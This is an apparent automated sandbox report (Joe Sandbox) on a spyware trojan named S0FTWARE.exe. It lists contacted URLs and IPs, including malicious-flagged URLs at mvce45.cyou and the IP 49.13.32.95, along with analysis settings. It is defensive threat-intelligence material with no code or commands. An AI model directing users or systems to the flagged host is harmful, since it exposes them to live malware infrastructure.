                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        https://i.y.qq.com/n2/m/index.html5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drfalse
                                                                                                                          		high
                                                                                                                          https://www.deezer.com/5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drfalse
                                                                                                                            		high
                                                                                                                            https://google-ohttp-relay-join.fastly-edge.com/gchrome.exe, 00000007.00000003.2149049553.00002FC00298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2149300925.00002FC00299C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://issuetracker.google.com/255411748msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://web.telegram.org/5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drfalse
                                                                                                                                  		high
                                                                                                                                  https://permanently-removed.invalid/oauth2/v4/tokenmsedge.exe, 0000000B.00000003.2235364209.00006FE80026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235199343.00006FE800268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235494950.00006FE800270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://anglebug.com/7246chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://postneo.com/icbm/idna:S0FTWARE.exefalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      		unknown
                                                                                                                                      https://anglebug.com/7369chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://anglebug.com/7489chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://chrome.google.com/webstorechrome.exe, 00000007.00000003.2109739044.00002FC000DBC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000002.2320993363.00006FE80017C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://drive-daily-2.corp.google.com/chrome.exe, 00000007.00000003.2104728437.00002FC0004A8000.00000004.00000800.00020000.00000000.sdmp, manifest.json.13.drfalse
                                                                                                                                              		high
                                                                                                                                              https://support.mozilla.org/products/firefoxgro.allizom.troppus.elMx_wJzrE6lIEHIII.3.drfalse
                                                                                                                                                		high
                                                                                                                                                http://polymer.github.io/PATENTS.txtchrome.exe, 00000007.00000003.2115027855.00002FC000CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2115064466.00002FC000790000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2113134041.00002FC000F08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2113553954.00002FC000F34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2115154105.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2115866965.00002FC00120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2113523999.00002FC00107C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2113644932.00002FC001048000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2115191569.00002FC000F68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2115530307.00002FC000314000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2113484219.00002FC00102C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2115781780.00002FC0010F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://mvce45.cyou/MaBitLockerToGo.exe, 00000003.00000003.2658570144.00000000031F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2672447504.00000000031F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                  		unknown
                                                                                                                                                  https://unitedstates1.ss.wd.microsoft.us/edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.13.drfalse
                                                                                                                                                    		high
                                                                                                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=BitLockerToGo.exe, 00000003.00000003.2376930526.0000000003252000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2659522028.0000000003346000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2180204344.0000000003252000.00000004.00000020.00020000.00000000.sdmp, FBFCAK.3.dr, KFIJEG.3.dr, Web Data.13.drfalse
                                                                                                                                                      		high
                                                                                                                                                      http://madskills.com/public/xml/rss/module/trackback/reflect.Value.Slice:S0FTWARE.exefalse
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      		unknown
                                                                                                                                                      https://issuetracker.google.com/161903006msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.BitLockerToGo.exe, 00000003.00000002.2672327052.00000000031D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2660816657.0000000003234000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2660591865.00000000031D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2671865903.00000000031AA000.00000004.00000020.00020000.00000000.sdmp, BGDAAE.3.drfalse
                                                                                                                                                          		high
                                                                                                                                                          https://www.ecosia.org/newtab/BitLockerToGo.exe, 00000003.00000003.2376930526.0000000003252000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2180204344.0000000003252000.00000004.00000020.00020000.00000000.sdmp, KFIJEG.3.drfalse
                                                                                                                                                            		high
                                                                                                                                                            https://drive-daily-1.corp.google.com/chrome.exe, 00000007.00000003.2104728437.00002FC0004A8000.00000004.00000800.00020000.00000000.sdmp, manifest.json.13.drfalse
                                                                                                                                                              		high
                                                                                                                                                              https://excel.new?from=EdgeM365Shoreline5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drfalse
                                                                                                                                                                		high
                                                                                                                                                                https://drive-daily-5.corp.google.com/chrome.exe, 00000007.00000003.2104728437.00002FC0004A8000.00000004.00000800.00020000.00000000.sdmp, manifest.json.13.drfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://google-ohttp-relay-query.fastly-edge.com/https://google-ohttp-relay-join.fastly-edge.com/Schrome.exe, 00000007.00000003.2149049553.00002FC00298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2149300925.00002FC00299C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://permanently-removed.invalid/chrome/blank.htmlmsedge.exe, 0000000B.00000003.2235364209.00006FE80026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235199343.00006FE800268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235494950.00006FE800270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      http://anglebug.com/3078chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        http://anglebug.com/7553chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          http://anglebug.com/5375chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://mvce45.cyou/sT$BitLockerToGo.exe, 00000003.00000002.2671865903.00000000030F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                            		unknown
                                                                                                                                                                            https://permanently-removed.invalid/v1/issuetokenmsedge.exe, 0000000B.00000003.2235364209.00006FE80026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235199343.00006FE800268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235494950.00006FE800270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              http://anglebug.com/5371chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                http://anglebug.com/4722chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://permanently-removed.invalid/reauth/v1beta/users/msedge.exe, 0000000B.00000003.2235364209.00006FE80026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235199343.00006FE800268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235494950.00006FE800270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://mvce45.cyou/CDuBitLockerToGo.exe, 00000003.00000003.2169542860.00000000031D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2169089850.00000000031D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2168516828.00000000031D2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                    		unknown
                                                                                                                                                                                    http://anglebug.com/7556chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://mvce45.cyou/000BitLockerToGo.exe, 00000003.00000002.2672327052.00000000031D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2660591865.00000000031D2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                                                                      		unknown
                                                                                                                                                                                      https://chromewebstore.google.com/msedge.exe, 0000000B.00000002.2320993363.00006FE80017C000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.13.drfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgBitLockerToGo.exe, 00000003.00000002.2672327052.00000000031D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2660816657.0000000003234000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2660591865.00000000031D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2671865903.00000000031AA000.00000004.00000020.00020000.00000000.sdmp, BGDAAE.3.drfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://drive-preprod.corp.google.com/chrome.exe, 00000007.00000003.2104728437.00002FC0004A8000.00000004.00000800.00020000.00000000.sdmp, manifest.json.13.drfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://publickeyservice.pa.gcp.privacysandboxservices.comchrome.exe, 00000007.00000003.2148608475.00002FC00240C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://mvce45.cyou/bBitLockerToGo.exe, 00000003.00000003.2378639595.00000000031E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                              		unknown
                                                                                                                                                                                              https://permanently-removed.invalid/RotateBoundCookiesmsedge.exe, 0000000B.00000003.2235364209.00006FE80026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235199343.00006FE800268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235494950.00006FE800270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                http://anglebug.com/6692chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://issuetracker.google.com/258207403msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    http://anglebug.com/3502chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      http://anglebug.com/3623msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://www.office.com5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          http://anglebug.com/3625msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://outlook.live.com/mail/0/5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              http://anglebug.com/3624msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                https://docs.google.com/presentation/Jchrome.exe, 00000007.00000003.2149161870.00002FC0012A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  http://anglebug.com/5007chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    http://anglebug.com/3862chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      https://chrome.google.com/webstoreLDDiscoverchrome.exe, 00000007.00000003.2114645411.00002FC000CB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2116267973.00002FC000394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2126794662.00002FC000CB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2116897074.00002FC000CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109108414.00002FC000394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109131079.00002FC000CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2110583766.00002FC000CB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109177552.00002FC000CB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2112515732.00002FC000DBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109739044.00002FC000DBC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                        https://mvce45.cyou/sBitLockerToGo.exe, 00000003.00000002.2672327052.00000000031D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2660591865.00000000031D2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                                        http://anglebug.com/4836chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                          https://issuetracker.google.com/issues/166475273msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            		high
                                                                                                                                                                                                                            https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29chrome.exe, 00000007.00000003.2148608475.00002FC00240C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              		high
                                                                                                                                                                                                                              https://tidal.com/5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drfalse
                                                                                                                                                                                                                                		high
                                                                                                                                                                                                                                https://docs.google.com/presentation/:chrome.exe, 00000007.00000003.2149161870.00002FC0012A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  		high

                                                                                                                                                                                                                                  World Map of Contacted IPs

                                                                                                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                                                                                                  Public IPs

                                                                                                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                  13.107.246.63
                                                                                                                                                                                                                                  		s-part-0035.t-0009.t-msedge.netUnited States
                                                                                                                                                                                                                                  		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                  20.25.227.174
                                                                                                                                                                                                                                  		unknownUnited States
                                                                                                                                                                                                                                  		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                  13.107.246.40
                                                                                                                                                                                                                                  		unknownUnited States
                                                                                                                                                                                                                                  		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                  18.165.220.106
                                                                                                                                                                                                                                  		sb.scorecardresearch.comUnited States
                                                                                                                                                                                                                                  		3MIT-GATEWAYSUSfalse
                                                                                                                                                                                                                                  152.195.19.97
                                                                                                                                                                                                                                  		unknownUnited States
                                                                                                                                                                                                                                  		15133EDGECASTUSfalse
                                                                                                                                                                                                                                  20.189.173.2
                                                                                                                                                                                                                                  		unknownUnited States
                                                                                                                                                                                                                                  		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                  149.154.167.99
                                                                                                                                                                                                                                  		t.meUnited Kingdom
                                                                                                                                                                                                                                  		62041TELEGRAMRUfalse
                                                                                                                                                                                                                                  162.159.61.3
                                                                                                                                                                                                                                  		chrome.cloudflare-dns.comUnited States
                                                                                                                                                                                                                                  		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                  172.217.21.36
                                                                                                                                                                                                                                  		www.google.comUnited States
                                                                                                                                                                                                                                  		15169GOOGLEUSfalse
                                                                                                                                                                                                                                  172.64.41.3
                                                                                                                                                                                                                                  		unknownUnited States
                                                                                                                                                                                                                                  		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                  23.44.203.23
                                                                                                                                                                                                                                  		unknownUnited States
                                                                                                                                                                                                                                  		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                  94.245.104.56
                                                                                                                                                                                                                                  		ssl.bingadsedgeextension-prod-europe.azurewebsites.netUnited Kingdom
                                                                                                                                                                                                                                  		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                  2.16.158.185
                                                                                                                                                                                                                                  		unknownEuropean Union
                                                                                                                                                                                                                                  		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                  239.255.255.250
                                                                                                                                                                                                                                  		unknownReserved
                                                                                                                                                                                                                                  		unknownunknownfalse
                                                                                                                                                                                                                                  23.44.203.16
                                                                                                                                                                                                                                  		unknownUnited States
                                                                                                                                                                                                                                  		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                  142.250.65.225
                                                                                                                                                                                                                                  		unknownUnited States
                                                                                                                                                                                                                                  		15169GOOGLEUSfalse
                                                                                                                                                                                                                                  49.13.32.95
                                                                                                                                                                                                                                  		mvce45.cyouGermany
                                                                                                                                                                                                                                  		24940HETZNER-ASDEtrue

                                                                                                                                                                                                                                  Private

                                                                                                                                                                                                                                  IP
                                                                                                                                                                                                                                  192.168.2.8
                                                                                                                                                                                                                                  127.0.0.1

                                                                                                                                                                                                                                  General Information

                                                                                                                                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                  Analysis ID:1560256
                                                                                                                                                                                                                                  Start date and time:2024-11-21 15:46:11 +01:00
                                                                                                                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                  Overall analysis duration:0h 8m 58s
                                                                                                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                  Report type:full
                                                                                                                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                  Number of analysed new started processes analysed:23
                                                                                                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                                                                                                  Technologies:
                                                                                                                                                                                                                                  • HCA enabled
                                                                                                                                                                                                                                  • EGA enabled
                                                                                                                                                                                                                                  • AMSI enabled
                                                                                                                                                                                                                                  Analysis Mode:default
                                                                                                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                                                                                                  Sample name:S0FTWARE.exe
                                                                                                                                                                                                                                  Detection:MAL
                                                                                                                                                                                                                                  Classification:mal100.troj.spyw.evad.winEXE@64/255@22/19
                                                                                                                                                                                                                                  EGA Information:
                                                                                                                                                                                                                                  • Successful, ratio: 50%
                                                                                                                                                                                                                                  HCA Information:
                                                                                                                                                                                                                                  • Successful, ratio: 99%
                                                                                                                                                                                                                                  • Number of executed functions: 90
                                                                                                                                                                                                                                  • Number of non-executed functions: 149
                                                                                                                                                                                                                                  Cookbook Comments:
                                                                                                                                                                                                                                  • Found application associated with file extension: .exe

                                                                                                                                                                                                                                  Warnings

                                                                                                                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 192.229.221.95, 172.217.21.35, 172.217.17.46, 173.194.76.84, 34.104.35.123, 13.107.21.239, 204.79.197.239, 13.107.42.16, 204.79.197.203, 13.107.6.158, 2.20.68.234, 2.20.68.198, 51.137.3.145, 2.19.198.147, 2.19.198.121, 104.126.37.34, 104.126.37.19, 104.126.37.24, 104.126.37.26, 104.126.37.40, 104.126.37.27, 104.126.37.25, 104.126.37.33, 104.126.37.32, 2.18.40.144, 2.18.40.146, 2.18.40.148, 2.18.40.147, 2.18.40.142, 2.18.40.143, 2.18.40.137, 2.18.40.149, 2.18.40.136, 204.79.197.237, 13.107.21.237, 13.74.129.1, 172.165.69.228, 142.250.80.67, 142.251.32.99, 142.251.40.163
